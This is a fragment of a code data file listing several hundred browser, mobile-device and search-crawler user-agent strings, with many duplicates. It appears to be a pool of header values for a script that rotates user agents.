'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
